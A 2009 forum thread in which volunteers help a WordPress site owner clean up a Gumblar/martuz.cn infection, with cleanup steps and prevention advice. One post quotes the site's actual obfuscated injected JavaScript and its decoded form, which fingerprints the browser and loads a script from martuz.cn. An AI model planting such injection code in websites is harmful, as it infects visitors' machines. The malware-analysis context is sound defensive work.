Malware Domain List
Malware Related => Compromised Servers => Topic started by: garethplu on May 19, 2009, 11:09:38 pm
-
If someones website goes to "martuz.cn" what can they do to fix it?
-
1. Remove all malicious scripts from ALL files (i.e. restore a backup)
2. Lockdown ALL scripts (JS and PHP etc), and change FTP etc passwords
-
Thanks, how can I do that? Is there a step-by-step guide I can follow for someone with basic skills. Will my website host be able to help also?
-
Your host may have a backup, but you shouldn't rely on that. They will however, be able to reset your FTP etc passwords for you.
If you don't have a clean copy of the websites files (e.g. stored locally on your computer), then your choices are severely limited as they are;
1. Download all of the files, and run through their respective source codes, and remove the malicious source code
2. Start the website from scratch
-
How do I know what the malicious source code is?
-
Can you post the URL to your website?
-
http://www.stadiatech.com
The one that really puzzles me. I have tried accessing my website from a few computers and it is only my computer which heads to "martuz.cn" is that normal?!!!
MysteryFCM: URL disabled
-
Looking at your sites source code, shows the following;
(function(DBCp){var O7l='%';eval(unescape((':76ar:20a:3d:22ScriptEngine:22:2cb:3d:22V:65r:73:69on():2b:22:2cj:3d:22:22:2cu:3d:6eaviga:74:6fr:2eu:73er:41g:65n:74:3bif((u:2einde:78Of(:22:43:68rom:65:22):3c:30):26:26(u:2eind:65xOf(:22W:69n:22):3e0):26:26(u:2eindexOf(:22NT:206:22:29:3c0):26:26(do:63ument:2ec:6fokie:2e:69nde:78Of(:22miek:3d1:22:29:3c:30):26:26:28:74y:70eo:66(z:72v:7at:73):21:3dtypeo:66(:22A:22))):7b:7a:72v:7ats:3d:22:41:22:3beva:6c(:22if:28wi:6ed:6f:77:2e:22+a+:22:29j:3dj+:22+a:2b:22:4da:6ao:72:22+b+a+:22M:69nor:22:2bb+:61+:22:42u:69l:64:22:2bb+:22:6a:3b:22):3bd:6fc:75ment:2ewrite:28:22:3cscript:20src:3d:2f:2fmart:22:2b:22uz:2ec:6e:2fvid:2f:3fid:3d:22:2bj+:22:3e:3c:5c:2f:73c:72ipt:3e:22):3b:7d').replace(DBCp,O7l)))})(/\:/g);
Which decodes to;
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");}
You're rather lucky here, aslong as the script is the same in all files, as all you need to do is search for the string "mart", as the obfuscation is extremely basic.
On your homepage, this script appears just next to the "HEAD" HTML tag;
-
The one that really puzzles me. I have tried accessing my website from a few computers and it is only my computer which heads to "martuz.cn" is that normal?!!!
It depends entirely on the settings of the browser and the firewall (i.e. if the browser is set to block Javascript it won't load, and if the firewall is corporately owned, it's likely already set to block this domain)
-
Since you're using WordPress by the way, the main files you need to reinstall and/or clean, are your themes (located in /wp-content/themes), though I'd recommend checking ALL of the files just to be on the safe side, as chances are, they'll have also uploaded a shell to enable them to re-access your site, should the FTP credentials be changed. If you're comfortable doing so, it will be much quicker and much easier, to delete the WordPress files, and re-upload a clean copy of them (you can obtain the WordPress files from wordpress.org)
-
I recommend to delete all files at your site and to restore everything
from a clean backup. Some php files have been added by this malware, for
example /images/gifimg.php. I don't recommend to sort out the files manually.
Please change the password of your site and restore your site completely from a backup.
Don't try to fix individual files if you don't know exactly why you are doing.
-
If it comes to it can I pay someone to fix this and similiar problems?
-
Your hosting company would probably be happy to do it for you. If not, post back here and I'll do it for free for you.
-
Cheers dude, the world needs more people like you.
I shall speak with the host and see what they say. The RSS no longer works, do you think its related?
-
More than likely, yes.
-
Damn.
I've tried a feed validator http://feedvalidator.org/check.cgi?url=http%3A%2F%2Fwww.stadiatech.com%2Ffeed#l241
and it tells me that line 241 is wrong. I have been using the Wordpress forum for two days now but the operator of the forum keeps tell me to find the code. Im not sure how to find the code, what code Im looking for or what to if I find it.
I have changed my FTP password btw.
-
The feed likely won't validate whilst the code is present.
Follow the steps below to clean it out;
1. Login to your site via FTP
2. Delete the contents of the htdocs/wwwroot/public_html (or whichever it's called) folder
3. Download the following and extract the contents;
http://wordpress.org/latest.zip
4. Upload the ENTIRE contents of the zip
IMPORTANT: You MUST ensure you make a copy of your wp-config.php file BEFORE doing step 2, as you'll need the database credentials and information, present in this file, to put into the new wp-config.php file, prior to uploading it
Please note, once this is done, you will need to re-install any plugins you had installed.
-
Sorry Steve,
I've had a good look and I dont recognise this file or anything based on "wwwroot" or "public_html" : "htdocs/wwwroot/public_html"
I notice the zip file is of 2.7.1 which I have installed (this install led to the problem)
Many thanks for the help your giving by the way.
-
No problem.
If you'd prefer I do it for you, please e-mail me at;
mdl @ it-mate.co.uk
The only thing I'll need is your FTP credentials.
-
Hi,
This is what my host came back to me with:
"I visited and checked your website www.stadiatech.com but it does not
prompt for a virus threat and also the site loads just fine. It did not
even tried to redirect the page to martuz.cn."
I'm starting to find this very stressful. I dont know why my host cant find the problem and fix it.
-
I've just checked, and the problem is definately still there. Either they didn't look properly, used a browser with JS disabled, or both. Feel free to point them here if need be;
http://vurl.mysteryfcm.co.uk/?url=625774
The script is on line #39
-
Thats whats they told me on the Wordpress website but I cant find that code.
If I delete that will it sort this problem?
Thanks.
-
You could just delete the code, yes (see /wp-content/themes/{theme}/header.php), however, these types of attacks have usually seen extra files added, so they can still get in even when the FTP password is changed, so it's a much better idea just to do a complete refresh.
As mentioned, we'll be happy to help you do this if necessary :)
-
Thanks Steve, so how did the code get in their. Is it a virus and does it have a pirticular purpose. Is their way of ensuring it doesn't happen again.
How did you get so knowledgable about this stuff?
-
Most of the gumblar/martuz infections, are done by sniffing the computer that usually connects to it, for FTP etc passwords (which also means you'll need to check your machine), for details, please refer to;
http://www.malwaredomainlist.com/forums/index.php?topic=2892.msg9833#msg9833
http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/
One of the samples we've seen, have shown it to create both a _.exe and e.bat file (amongst other things) in the root of the infected machine (usually C:\), so it will be worth checking your machine for signs of this infection. For details, please see;
http://www.threatexpert.com/report.aspx?md5=2131112053ed144c46277b9024bcf39f
As far as prevention of this happening again, there are a couple of things you can do;
1. Change your FTP password (I know you've done that already, but I suggest doing it frequently (at least weekly))
2. DO NOT use regular FTP as passwords are sent in plain text - use sFTP (Secure FTP) instead if your host allows it
3. Backup your site frequently - this way, if it does happen again, you can just delete the current files, and restore the backup (again, the backup should be stored in a secure location)
4. Keep your computer up to date (e.g. install Windows patches and such) - not guaranteed to prevent it, but will help
5. Install a firewall on your local computer (this will also help prevent infections sending out your data - again not a guarantee, but will help)
Finally, and most importantly - keep WordPress (and any plugins you have installed) up to date - this will help prevent infections occuring via SQL injection etc.
Again however, none of the above will guarantee to prevent this occuring again - there are no guarantees when it comes to this type of thing unfortunately.
As for how I became knowledgeable, I'm self taught ;) (you'll usually find this is the same for the vast majority of people)
-
Thanks Steve,
I have now recived an email from Google.
Thanks for your advice but how do I follow points 2 and 3.
What is Secure FTP and how do I backup the site?
-
sFTP is done in pretty much the same fashion as FTP;
http://winscp.net/eng/docs/protocols#sftp
http://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol
With regards to backing up your site, the easiest way to backup the files, is by FTP. Your sites database can be backed up either via the WordPress ACP, or via phpMyAdmin (if you've got it installed on the server)